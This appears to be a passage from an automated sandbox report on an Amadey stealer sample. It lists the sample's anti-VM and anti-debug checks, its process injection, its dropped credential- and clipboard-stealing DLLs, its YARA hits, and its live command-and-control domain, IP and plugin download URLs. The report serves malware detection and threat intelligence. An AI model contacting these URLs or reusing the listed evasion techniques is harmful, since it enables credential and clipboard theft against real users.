Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fE7X8Fp2WG.exe_777bac5a67f8742582a3f98a2f166c5f7aec29a_5b55d45e_3e4375e7-26f8-4e5e-89dc-2ae36a285385\
Source: Amcache.hve.3.dr Binary or memory string: VMware
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Dctooux.exe, 0000001F.00000003.2647751222.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001F.00000002.2894214163.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001F.00000002.2895598813.0000000005CE0000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001F.00000002.2894214163.0000000003040000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_00439DAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00439DAE
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_0042F299 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0042F299
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_0043D592 mov eax, dword ptr fs:[00000030h] 0_2_0043D592
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_0043982B mov eax, dword ptr fs:[00000030h] 0_2_0043982B
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02F1D7F9 mov eax, dword ptr fs:[00000030h] 0_2_02F1D7F9
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02F19A92 mov eax, dword ptr fs:[00000030h] 0_2_02F19A92
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02EE092B mov eax, dword ptr fs:[00000030h] 0_2_02EE092B
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02EE0D90 mov eax, dword ptr fs:[00000030h] 0_2_02EE0D90
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02FA1033 push dword ptr fs:[00000030h] 0_2_02FA1033
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_0043D592 mov eax, dword ptr fs:[00000030h] 22_2_0043D592
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_0043982B mov eax, dword ptr fs:[00000030h] 22_2_0043982B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_0301D7F9 mov eax, dword ptr fs:[00000030h] 22_2_0301D7F9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_03019A92 mov eax, dword ptr fs:[00000030h] 22_2_03019A92
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_02FE092B mov eax, dword ptr fs:[00000030h] 22_2_02FE092B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_02FE0D90 mov eax, dword ptr fs:[00000030h] 22_2_02FE0D90
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_030A103B push dword ptr fs:[00000030h] 22_2_030A103B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_0043D592 mov eax, dword ptr fs:[00000030h] 31_2_0043D592
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_0043982B mov eax, dword ptr fs:[00000030h] 31_2_0043982B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_0300545B push dword ptr fs:[00000030h] 31_2_0300545B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_049CD7F9 mov eax, dword ptr fs:[00000030h] 31_2_049CD7F9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_04990D90 mov eax, dword ptr fs:[00000030h] 31_2_04990D90
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_0499092B mov eax, dword ptr fs:[00000030h] 31_2_0499092B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_049C9A92 mov eax, dword ptr fs:[00000030h] 31_2_049C9A92
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_004420F3 GetProcessHeap, 31_2_004420F3
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_0042101F SetUnhandledExceptionFilter, 0_2_0042101F
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_004204EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004204EC
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_00439DAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00439DAE
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_00420EBA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00420EBA
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02F1A015 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_02F1A015
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02F01121 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_02F01121
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02F00753 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_02F00753
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_004204EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_004204EC
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_00439DAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_00439DAE
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_00420EBA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_00420EBA
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_03001121 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_03001121
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_0301A015 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_0301A015
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_03000753 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_03000753
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_004204EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 31_2_004204EC
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_00420EBA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 31_2_00420EBA
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_0042101F SetUnhandledExceptionFilter, 31_2_0042101F
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_00439DAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 31_2_00439DAE
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_049B0753 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 31_2_049B0753
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_049CA015 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 31_2_049CA015
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_049B1121 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 31_2_049B1121

HIPS / PFW / Operating System Protection Evasion
barindex
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_004074F0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree, 0_2_004074F0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Process created: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe "C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_004210A6 cpuid 0_2_004210A6
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_0040B375 CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0040B375
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_0040B2A0 GetUserNameA, 0_2_0040B2A0
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_00408180 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 0_2_00408180
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.3.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadey
Source: Yara match File source: Process Memory Space: Dctooux.exe PID: 7960, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Amadeys stealer DLL
Source: Yara match File source: 0.2.fE7X8Fp2WG.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.Dctooux.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.Dctooux.exe.2fe0e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.Dctooux.exe.4990e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.3.Dctooux.exe.4a00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.fE7X8Fp2WG.exe.4a20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.3.Dctooux.exe.4a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.fE7X8Fp2WG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.Dctooux.exe.2fe0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.Dctooux.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.fE7X8Fp2WG.exe.2ee0e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.fE7X8Fp2WG.exe.4a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.3.Dctooux.exe.4a00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.3.Dctooux.exe.4a20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.fE7X8Fp2WG.exe.2ee0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.Dctooux.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.Dctooux.exe.4990e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.Dctooux.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000002.1927120210.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1919836800.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1921437711.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1925827416.0000000000400000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1691825637.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.1884811614.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2892635226.0000000000400000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.2378195176.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2894939498.0000000004990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_00431251 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 0_2_00431251
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_00431F48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 0_2_00431F48
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02F121AF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 0_2_02F121AF
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02F114B8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 0_2_02F114B8
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_00431251 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 22_2_00431251
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_00431F48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 22_2_00431F48
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_030121AF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 22_2_030121AF
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_030114B8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 22_2_030114B8
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_00402340 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ, 31_2_00402340
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_00431251 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 31_2_00431251
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_00431F48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 31_2_00431F48
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_049C14B8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 31_2_049C14B8
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_049C21AF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 31_2_049C21AF
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1427171 Sample: fE7X8Fp2WG.exe Startdate: 17/04/2024 Architecture: WINDOWS Score: 100 44 topgamecheats.dev 2->44 48 Multi AV Scanner detection for domain / URL 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 7 other signatures 2->54 8 fE7X8Fp2WG.exe 5 2->8         started        12 Dctooux.exe 2->12         started        signatures3 process4 dnsIp5 34 C:\Users\user\AppData\Local\...\Dctooux.exe, PE32 8->34 dropped 56 Detected unpacking (changes PE section rights) 8->56 58 Detected unpacking (overwrites its own PE header) 8->58 60 Contains functionality to inject code into remote processes 8->60 15 Dctooux.exe 8->15         started        18 WerFault.exe 16 8->18         started        20 WerFault.exe 16 8->20         started        30 9 other processes 8->30 46 topgamecheats.dev 93.123.39.96, 49746, 49747, 49748 NET1-ASBG Bulgaria 12->46 36 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 12->36 dropped 38 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 12->38 dropped 40 C:\Users\user\AppData\Local\...\clip64[1].dll, PE32 12->40 dropped 42 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32+ 12->42 dropped 22 WerFault.exe 12->22         started        24 WerFault.exe 12->24         started        26 WerFault.exe 12->26         started        28 WerFault.exe 12->28         started        file6 signatures7 process8 signatures9 62 Multi AV Scanner detection for dropped file 15->62 64 Detected unpacking (changes PE section rights) 15->64 66 Detected unpacking (overwrites its own PE header) 15->66 32 WerFault.exe 15->32         started        process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
93.123.39.96
 topgamecheats.dev Bulgaria
43561 NET1-ASBG true

Contacted Domains

Name IP Active
topgamecheats.dev 93.123.39.96 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll false unknown
http://topgamecheats.dev/j4Fvskd3/index.php?scr=1 false unknown
http://topgamecheats.dev/j4Fvskd3/index.php false unknown
topgamecheats.dev/j4Fvskd3/index.php true low
http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dll false unknown